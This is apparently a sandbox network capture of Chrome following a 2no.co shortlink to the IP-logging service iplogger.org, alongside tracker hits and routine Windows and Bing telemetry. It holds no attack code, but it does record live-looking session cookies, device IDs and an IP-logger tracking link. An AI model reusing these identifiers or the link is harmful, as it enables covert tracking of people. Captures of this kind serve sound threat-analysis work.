                                                                                                                Jul 30, 2024 00:49:18.796566010 CEST44349742104.21.4.208192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.823096037 CEST49743443192.168.2.988.212.201.204
                                                                                                                Jul 30, 2024 00:49:18.823132038 CEST4434974388.212.201.204192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.823201895 CEST49743443192.168.2.988.212.201.204
                                                                                                                Jul 30, 2024 00:49:18.823530912 CEST49743443192.168.2.988.212.201.204
                                                                                                                Jul 30, 2024 00:49:18.823553085 CEST4434974388.212.201.204192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.926610947 CEST4434974123.206.229.209192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.926682949 CEST49741443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:18.944250107 CEST49744443192.168.2.9142.250.184.228
                                                                                                                Jul 30, 2024 00:49:18.944310904 CEST44349744142.250.184.228192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.944437981 CEST49744443192.168.2.9142.250.184.228
                                                                                                                Jul 30, 2024 00:49:18.944639921 CEST49744443192.168.2.9142.250.184.228
                                                                                                                Jul 30, 2024 00:49:18.944655895 CEST44349744142.250.184.228192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.959341049 CEST49741443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:18.959366083 CEST4434974123.206.229.209192.168.2.9
                                                                                                                Jul 30, 2024 00:49:18.959701061 CEST4434974123.206.229.209192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.144927025 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.144927025 CEST61122443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.144943953 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.144953966 CEST4436112240.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.322896004 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.322925091 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:41.322999001 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.323396921 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:41.323405981 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.139254093 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.139425039 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.141288042 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.141310930 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.141638041 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.142836094 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.188492060 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.478075981 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.478101015 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.478131056 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.478208065 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.478234053 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.478251934 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.478280067 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.482860088 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.482898951 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.482940912 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.482949018 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.482965946 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.482975006 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.483493090 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.485455990 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.485469103 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:42.485493898 CEST61123443192.168.2.940.127.169.103
                                                                                                                Jul 30, 2024 00:49:42.485500097 CEST4436112340.127.169.103192.168.2.9
                                                                                                                Jul 30, 2024 00:49:47.326420069 CEST49741443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:47.326420069 CEST49741443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:49:47.326474905 CEST4434974123.206.229.209192.168.2.9
                                                                                                                Jul 30, 2024 00:49:47.326525927 CEST49741443192.168.2.923.206.229.209
                                                                                                                Jul 30, 2024 00:50:19.008589983 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:19.008634090 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:19.008814096 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:19.008970022 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:19.008981943 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:19.664407969 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:19.664683104 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:19.664701939 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:19.665220976 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:19.665517092 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:19.665571928 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:19.720438004 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:29.586137056 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:29.586210012 CEST44361125142.250.181.228192.168.2.9
                                                                                                                Jul 30, 2024 00:50:29.586266994 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:31.520147085 CEST61125443192.168.2.9142.250.181.228
                                                                                                                Jul 30, 2024 00:50:31.520179033 CEST44361125142.250.181.228192.168.2.9
                                                                                                                • 2no.co
                                                                                                                • https:
                                                                                                                  • cdn.iplogger.org
                                                                                                                  • counter.yadro.ru
                                                                                                                  • www.bing.com
                                                                                                                • slscr.update.microsoft.com
                                                                                                                • a.nel.cloudflare.com
                                                                                                                • fs.microsoft.com
                                                                                                                • fe3cr.delivery.mp.microsoft.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49722 | 172.67.149.76 | 443 | 5364 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:49:15 UTC | 655 | OUT | GET /24RXx6 HTTP/1.1
                                                                                                                Host: 2no.co
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-07-29 22:49:16 UTC | 1089 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Mon, 29 Jul 2024 22:49:16 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                set-cookie: 54988964137263905=1; expires=Tue, 29 Jul 2025 22:49:16 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                set-cookie: unikey=unikey_8355deb3d6713dce9697dd87f6c09469523dcb34aad54ffbbeb80daf49b4b947; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                memory: 0.4217071533203125
                                                                                                                expires: Mon, 29 Jul 2024 22:49:16 +0000
                                                                                                                strict-transport-security: max-age=604800
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KvpSgXJ1mP5JWZIjXUk6UwXmu4hNZv3lz1OMGpS0%2BLmZlGnTpwngXEFTYTgg5wHD95n7%2FJFOtDQf0Eyo0EyuiD20eM872vEx6NaKHYmRzaNMefEeE4gS9MY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ab0a9411fca4368-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49731 | 104.21.4.208 | 443 | 5364 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:49:17 UTC | 588 | OUT | GET /redirect/handshake.png HTTP/1.1
                                                                                                                Host: cdn.iplogger.org
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://2no.co/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-07-29 22:49:17 UTC | 1285 | IN | HTTP/1.1 403 Forbidden
                                                                                                                Date: Mon, 29 Jul 2024 22:49:17 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                Referrer-Policy: same-origin
                                                                                                                X-Content-Options: nosniff
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                cf-mitigated: challenge


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49730 | 88.212.202.52 | 443 | 5364 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:49:17 UTC | 665 | OUT | GET /hit?t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 HTTP/1.1
                                                                                                                Host: counter.yadro.ru
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://2no.co/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-07-29 22:49:17 UTC | 602 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                Server: nginx/1.17.9
                                                                                                                Date: Mon, 29 Jul 2024 22:49:17 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 32
                                                                                                                Connection: close
                                                                                                                Location: https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069
                                                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                                                Pragma: no-cache
                                                                                                                Cache-control: no-cache
                                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                                Set-Cookie: FTID=1cg1nj32dger1cg1nj00367b; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                                Strict-Transport-Security: max-age=86400
2024-07-29 22:49:17 UTC | 32 | IN | Data Ascii: <html><body>Moved</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49733 | 35.190.80.1 | 443 | 5364 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:49:17 UTC | 543 | OUT | OPTIONS /report/v4?s=%2BJTmNHgwHioPN1VPmZTocnt4x9yCwTmjK4IGhHrpCVWNf%2BX0QfcS27EEgMEfDt3n5oBkVrfy2gmymxlRNncb3eE%2BNabns2V2oWdUqt%2B6pchIIk0y0eYxI%2Bvmxvy3PDh%2B%2FlTe HTTP/1.1
                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                Connection: keep-alive
                                                                                                                Origin: https://cdn.iplogger.org
                                                                                                                Access-Control-Request-Method: POST
                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-07-29 22:49:17 UTC | 336 | IN | HTTP/1.1 200 OK
                                                                                                                Content-Length: 0
                                                                                                                access-control-max-age: 86400
                                                                                                                access-control-allow-methods: POST, OPTIONS
                                                                                                                access-control-allow-origin: *
                                                                                                                access-control-allow-headers: content-length, content-type
                                                                                                                date: Mon, 29 Jul 2024 22:49:17 GMT
                                                                                                                Via: 1.1 google
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49732 | 20.114.59.183 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:49:18 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vWUpoG9ux8uKoBS&MD=+k9WfbGS HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                Host: slscr.update.microsoft.com
2024-07-29 22:49:18 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Expires: -1
                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                MS-CorrelationId: 43915090-0741-4853-8b92-023f0f7b4ba3
                                                                                                                MS-RequestId: 16bd080c-ef16-4974-aeab-7ac6c78d49a2
                                                                                                                MS-CV: wpDfPoWlBE6D/CA7.0
                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Mon, 29 Jul 2024 22:49:17 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 24490


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49736 | 88.212.202.52 | 443 | 5364 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:49:18 UTC | 706 | OUT | GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 HTTP/1.1
                                                                                                                Host: counter.yadro.ru
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://2no.co/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                Cookie: FTID=1cg1nj32dger1cg1nj00367b
2024-07-29 22:49:18 UTC | 481 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.17.9
                                                                                                                Date: Mon, 29 Jul 2024 22:49:18 GMT
                                                                                                                Content-Type: image/gif
                                                                                                                Content-Length: 445
                                                                                                                Connection: close
                                                                                                                Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                                                                Pragma: no-cache
                                                                                                                Cache-control: no-cache
                                                                                                                P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                                                                Set-Cookie: VID=2DNPIG0nbdur1cg1nk003HAo; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Strict-Transport-Security: max-age=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 49740 | 35.190.80.1 | 443 | 5364 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:49:18 UTC | 484 | OUT | POST /report/v4?s=%2BJTmNHgwHioPN1VPmZTocnt4x9yCwTmjK4IGhHrpCVWNf%2BX0QfcS27EEgMEfDt3n5oBkVrfy2gmymxlRNncb3eE%2BNabns2V2oWdUqt%2B6pchIIk0y0eYxI%2Bvmxvy3PDh%2B%2FlTe HTTP/1.1
                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                Connection: keep-alive
                                                                                                                Content-Length: 423
                                                                                                                Content-Type: application/reports+json
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
2024-07-29 22:49:18 UTC | 423 | OUT | Data Ascii: [{"age":1,"body":{"elapsed_time":1106,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://2no.co/","sampling_fraction":1.0,"server_ip":"104.21.4.208","status_code":403,"type":"http.error"},"type":"network-error","url":"https://c
2024-07-29 22:49:18 UTC | 168 | IN | HTTP/1.1 200 OK
                                                                                                                Content-Length: 0
                                                                                                                date: Mon, 29 Jul 2024 22:49:18 GMT
                                                                                                                Via: 1.1 google
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
7 | 192.168.2.9 | 49741 | 23.206.229.209 | 443
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:49:18 UTC | 2223 | OUT | POST /threshold/xls.aspx HTTP/1.1
                                                                                                                Origin: https://www.bing.com
                                                                                                                Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-CH
                                                                                                                Content-type: text/xml
                                                                                                                X-Agent-DeviceId: 01000A4109008071
                                                                                                                X-BM-CBT: 1696497265
                                                                                                                X-BM-DateFormat: dd/MM/yyyy
                                                                                                                X-BM-DeviceDimensions: 784x984
                                                                                                                X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                X-BM-DeviceScale: 100
                                                                                                                X-BM-DTZ: 60
                                                                                                                X-BM-Market: CH
                                                                                                                X-BM-Theme: 000000;0078d7
                                                                                                                X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                X-Device-ClientSession: 3967AB70E8E74431908B580AED7E67B3
                                                                                                                X-Device-isOptin: false
                                                                                                                X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                X-Device-OSSKU: 48
                                                                                                                X-Device-Touch: false
                                                                                                                X-DeviceID: 01000A4109008071
                                                                                                                X-MSEdge-ExternalExp: bfbwsbghf928t,bfbwsbrs0830tf,d-thshldspcl40,fliptrac6,optfsc,spofglclickserpf2,wsbqfasmsall_t,wsbqfminiserp600,wsbref-c
                                                                                                                X-MSEdge-ExternalExpType: JointCoord
                                                                                                                X-PositionerType: Desktop
                                                                                                                X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                X-Search-CortanaAvailableCapabilities: None
                                                                                                                X-Search-SafeSearch: Moderate
                                                                                                                X-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard Time
                                                                                                                X-UserAgeClass: Unknown
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                Host: www.bing.com
                                                                                                                Content-Length: 516
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: SRCHUID=V=2&GUID=507B984BF29F418EA13B8912FCE289B0&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&LUT=1696497029183&IPMH=5c67ba25&IPMID=1696497265539&HV=1696497179; CortanaAppUID=D36DDDF07E1B512856780840298B626F; MUID=531305E83CE64DE088676FE94B9682C4; _SS=SID=3314E043C3866D730FEDF3E2C2436C30&CPID=1696497266478&AC=1&CPH=c11e7441; _EDGE_S=SID=3314E043C3866D730FEDF3E2C2436C30; MUIDB=531305E83CE64DE088676FE94B9682C4
2024-07-29 22:49:18 UTC | 1 | OUT | Data Ascii: <
2024-07-29 22:49:18 UTC | 515 | OUT | Data Ascii: ClientInstRequest><CID>531305E83CE64DE088676FE94B9682C4</CID><Events><E><T>Event.ClientInst</T><IG>829FCEE88A524F41943F335B832D1A47</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                                                                2024-07-29 22:49:19 UTC | 480 | IN | HTTP/1.1 204 No Content
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                X-MSEdge-Ref: Ref A: 669DE395C7C64F93AB3AD1AB07540089 Ref B: LAX311000110035 Ref C: 2024-07-29T22:49:19Z
                                                                                                                Date: Mon, 29 Jul 2024 22:49:19 GMT
                                                                                                                Connection: close
                                                                                                                Alt-Svc: h3=":443"; ma=93600
                                                                                                                X-CDN-TraceID: 0.d1d7ce17.1722293359.2bc2cea0


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                8 | 192.168.2.9 | 49742 | 104.21.4.208 | 443 | 5364 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-07-29 22:49:19 UTC | 577 | OUT | GET /favicon.ico HTTP/1.1
                                                                                                                Host: cdn.iplogger.org
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                Sec-Fetch-Dest: image
                                                                                                                Referer: https://2no.co/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-07-29 22:49:19 UTC | 755 | IN | HTTP/1.1 200 OK
                                                                                                                Date: Mon, 29 Jul 2024 22:49:19 GMT
                                                                                                                Content-Type: image/x-icon
                                                                                                                Content-Length: 2833
                                                                                                                Connection: close
                                                                                                                last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                                etag: "629f3a26-b11"
                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                Cache-Control: max-age=14400
                                                                                                                CF-Cache-Status: HIT
                                                                                                                Age: 6037
                                                                                                                Accept-Ranges: bytes
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JoMXqJ2mbYFuFHwjCLyoKmOrb5Kd%2F762H3tpxfcpijtSRgLCe9U4%2B%2FVs06gulAgnd1OvtWwLXovhIeqqUJ3NHbHRv6seHbczlwLA7jG2KP9sWDH5qMge0JM3xaGal12KsQTN"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ab0a9591a848c65-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                9 | 192.168.2.9 | 49743 | 88.212.201.204 | 443 | 5364 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-07-29 22:49:20 UTC | 510 | OUT | GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069 HTTP/1.1
                                                                                                                Host: counter.yadro.ru
                                                                                                                Connection: keep-alive
